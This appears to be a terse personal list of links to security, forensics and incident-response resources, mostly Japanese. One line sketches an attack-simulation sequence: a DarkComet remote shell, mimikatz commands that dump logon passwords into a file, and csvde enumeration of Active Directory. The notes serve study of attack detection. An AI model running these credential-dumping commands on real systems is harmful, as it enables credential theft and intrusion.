https://docs.microsoft.com/ja-jp/enterprise-mobility-security/solutions/ata-attack-simulation-playbook

Defaultgateway Darkcomet RemoteShell ipconfig→192.168.0.XXXADSVのAdminPasswd mimikatzを/にsend privilege::debug sekurlsa::logonpasswords exit >> ~tmp/victim.txt csvde.exe -ur -f -b administrator datafusioncenter.local リモートマシンで起動…

https://www.aguse.jp/http://www.iphiroba.jp/ip.php

https://digital-forensics.sans.org/blog/2011/12/07/digital-forensic-sifting-super-timeline-analysis-and-creation

http://dev.classmethod.jp/study_meeting/volatility-framework/

https://digital-forensics.sans.org/media/poster_2014_find_evil.pdf

http://blog.amedama.jp/entry/2017/08/09/004706

https://crackstation.net/

https://www.ultimatewindowssecurity.com/

http://kira000.hatenadiary.jp/entry/2014/04/12/022801

https://technet.microsoft.com/ja-jp/sysinternals/bb842062

https://www.nomoreransom.org/crypto-sheriff.php?lang=ja

http://npnl.hatenablog.jp/entry/20080412/1207965105

http://www.nirsoft.net/utils/

https://orebibou.com/2015/06/nmap%E3%82%B3%E3%83%9E%E3%83%B3%E3%83%89%E3%81%A7%E8%A6%9A%E3%81%88%E3%81%A6%E3%81%8A%E3%81%8D%E3%81%9F%E3%81%84%E4%BD%BF%E3%81%84%E6%96%B911%E5%80%8B/ http://www.byakuya-shobo.co.jp/hj/moh/pdf/moh_p096_p099.pdf

http://logic.moo.jp/data/filedir/438_1.html